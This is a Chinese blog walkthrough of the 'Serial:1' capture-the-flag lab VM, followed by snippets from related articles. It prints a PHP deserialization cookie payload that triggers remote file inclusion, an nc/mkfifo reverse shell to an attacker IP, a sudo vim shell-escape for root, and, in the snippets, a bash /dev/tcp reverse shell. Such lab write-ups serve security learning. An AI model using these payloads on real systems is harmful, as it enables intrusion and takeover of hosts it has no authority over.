靶机实战 Serial:1

最新推荐文章于 2025-03-08 23:16:49 发布
最新推荐文章于 2025-03-08 23:16:49 发布
阅读量1.7k 收藏 35
点赞数 16
CC 4.0 BY-SA版权
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/TheLight9/article/details/143721590

0x01:环境搭建

        下载地址:Serial:1

        下载完成后得到一个如下图红框框选的文件

        打开VMware,新建虚拟机--->自定义--->一路回车到如下界面,选择使用现有虚拟磁盘

        然后找到刚才下载的.vmdk文件即可。

0x02:三板斧

        一、IP扫描

        打开kali,arp-scan -I eth0 -l

        二、端口扫描

        kali继续 nmap -p- -A -T4 -y 192.168.183.144

        端口开放是22 80

        三、目录扫描

        kali dirb http://192.168.183.144

0x03:漏洞发现

        首先去http://192.168.183.144/ 并没有什么信息


       
        再去http://192.168.183.144/backup/ 有一个压缩包

        下载,解压后发现是三个php文件

        源码泄露~

        通过代码分析,发现首页是有一个cookie值的,而这个cookie又先被序列化,后又经过base64编码。

        并且在log.class.php中,存在文件包含漏洞!

        
        BurpSuite 启动!
        打开代理,抓个包看看。

        果然存在一个编码后的cookie。
        解码后得到:O:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";O:7:"Welcome":0:{}}
        简单分析一下可以看出,最后是定义了一个Welcome类,且是空值

0x04:漏洞利用

        我们构造一个payload:
        O:4:"User":2:{s:4:"name";s:3:"sk4";s:3:"wel";O:3:"Log":1:{s:8:"type_log";s:25:"http://172.16.222.111/afk.php;";}}

        让网站访问我们主机上的文件(这里利用他的文件包含漏洞)

        
        这里用txt,上传上去的时候不会解析,如果用php后缀的话,上传的时候就会解析,调用的时候又会解析,导致损坏文件,无法得到预期效果。

        base64编码:            Tzo0OiJVc2VyIjoyOntzOjQ6Im5hbagdgiO3M6Mzoic2s0IjtzOjM6IndlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MjYgersdHA6Ly8xNzIuMTYuMy4xNC9hZmsudHh0Ijt9fQ==          
        将原来的cookie替换。

        由上图可以看出,存在反序列化漏洞。

        将文本内容修改为一句话木马,然后用AntSword连接,发现返回数据为空,这是因为AntSword没有cookie。

        所以我们换个方法,使用反弹shell。

        反弹shell:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.183.134+443+>/tmp/f

        cd ..到根目录,找到了一个资格证书文件

        直接读取

        应该是密码,而且看起来不太像有什么加密

        直接去登录

        成功以sk4用户的身份登录,接下来就是提权。

        最简单的提权语句:sudo vim -c ':!/bin/sh'(要有执行sudo命令的权限)

        

        

以上就是本次靶场实战的全部内容,希望能对您有一点帮助。

 

        

Shadowyz.
关注
[网络安全自学篇] 八十二.WHUCTF之隐写和逆向类解题思路WP(文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析)
杨秀璋的专栏
06-04 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。这篇文章将详细讲解WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[横向移动] WMIC 远程命令执行横向移动
最新发布
Blue17 の 小窝
03-20 1042
0x01:WMIC 工具介绍🌟0x01:WMIC 工具介绍WMI 是 Windows 在 PowerShell 还未发布前,微软用来管理 Windows 系统的重要数据库工具,WMI 本身的组织架构是一个数据库架构,WMI 使用 DCOM 或 WinRM 协议,自从 PsExec 在内网中被严格监控后,越来越多的反病毒厂商将 PsExec 加入了黑名单,于是黑客们渐渐开始使用 WMI 进行横向移动。
作业1.2 安装VMware,配置kali_Linux坏境,Metasploitable2靶机
LJW_wenjingli7的博客
10-13 820
因为kali和Metasploitable2都需要在VMware里打开,因此建议先安装好虚拟机再配置环境。
serial-1靶机
ppkr_itt的博客
11-15 835
_cookie是一个超级全局变量,用户上传一个cookie,如果上传coookie正确先反序列化再开始base64编码,否则开始base64解码后反序列化,所以提示我们上传cookie。外面软件解码,中间的空格直接用点预留出来,所以我们在点的地方插入%00,想办法传到log.class.php,发现还是不行。定义了两个类,welcome类和user类各自输出,$this->wel=new welcome把两个类合在一起。这句可以构造payload,去burp中更换cookie字段,发送一下,页面正常。
VMware搭建OWASP靶机
weixin_43487849的博客
06-18 1362
OWASP靶机搭建 先安装VMware,自行百度 官网下载靶机:https://sourceforge.net/projects/owaspbwa/ 2.解压缩,在VMware中打开vmx文件,注意是打开不是创建 点击编辑虚拟机设置-配置网络位NAT模式(这一步是为了安全性) 开启虚拟机,加载完后出现ip: 浏览器输入ip即可访问靶机,里面有很多靶场 ...
靶场搭建(一)VM虚拟机安装
m0_55655822的博客
02-10 2065
学习搭建靶场第一步之安装虚拟机
【解决办法】- 靶机导入VMware后无法自动获取IP地址
weixin_45221204的博客
06-02 1353
在渗透测试过程,我们需要下载靶机文件,然后导入VMware等工具,部署自己的靶场环境,但是由于靶场作者等因素,导致无法在渗透测试中,获取IP地址,我们就此问题给出实际解决方案。本文叙述了导入到Vmare的靶机无法获得IP地址的处理方案,其中涉及到的内容有linux基础操作(vim\dhclient)、VMware导入靶场操作等内容,操作相对简单。
反序列化靶机实战serial(保姆级教程)
2201_75891821的博客
08-01 1415
反序列靶机教程 详细
反序列化靶机serial复现
muyuchen110的博客
08-01 845
【代码】反序列化靶机serial复现。
反序列化靶机serial实战
m0_63944205的博客
08-01 335
页面只有一行文本:Hello sk4This is a beta test for new cookie handler,提示这里是新cookie进行程序测试,那我们查看cookie。这里我们没有看到任何可控的参数,也没有可输入的内容,我们也不清楚目录结构,那么我们可以尝试去扫描目录。我们拿到加密后的字符序列去进行抓包,并将字符序列替换到如图。我们发现命令成功,然后我们修改py.php代码为。我们发现一个压缩包,将他下载下来看看。解码后发现是一串字符序列。得到一串加密后的字符序列。放到www文件夹下访问。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2527
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
靶机实战-blogger
ST0new的博客
04-05 4114
一位Web 开发人员 James M Brunner 最近创建了一个博客网站。他雇佣你来测试他博客网站的安全性。
靶机实战系列之Tomato靶机(1),一次违反常规的鸿蒙大厂面试经历
2401_84181885的博客
04-14 477
linux-exploit-suggester可以用来枚举内核漏洞。发现漏洞号为45010搜索此漏洞,gcc编译,传到靶机。远程文件包含功能通过info.php发现已经关闭。发现存在ubuntu系统默认写入身份认证文件路径。滑至文末,获取“searchall”下载链接!尝试登录 ssh操作后会写入身份认证日志文件。同样的在日志文件中确实发现了存在相关记录。本地文件包含发现账号tomcat。并没有一句话木马,脚本已经被加载。image参数 存在 文件包含。1.4 源码分析+文件包含。1.6 反弹shell。
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 7046
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
网络空间安全学习
04-20 2174
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
靶机Lampiao入侵实战
没有网络安全就没有国家安全
03-08 1088
靶机Lampiao入侵实战
AWD靶机实战第二天:使用python脚本获取flag
2203_75839317的博客
04-10 2233
ls /flag.txt,就可以拿到flag的值。4,自动提交flag:现在我们就要考虑如何进行自动提交flag,我们来到提交页面发现有提示,有请求头。
Vulnhub napping-1.0.1靶机攻击实战(一)
初学者
02-08 913
到这里,就算获得了root的权限了,那么这里有人会问,为什么我们拿到了daniel用户的权限,不直接通过这个用户提权反而是要通过adrian用户建立反射shell进行提权呢?这个问题有兴趣的读者可以深入研究一下。
靶机实战:DC-8
CHAsichuan的博客
10-16 1391
一次较高难度的靶机实战分享和记录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值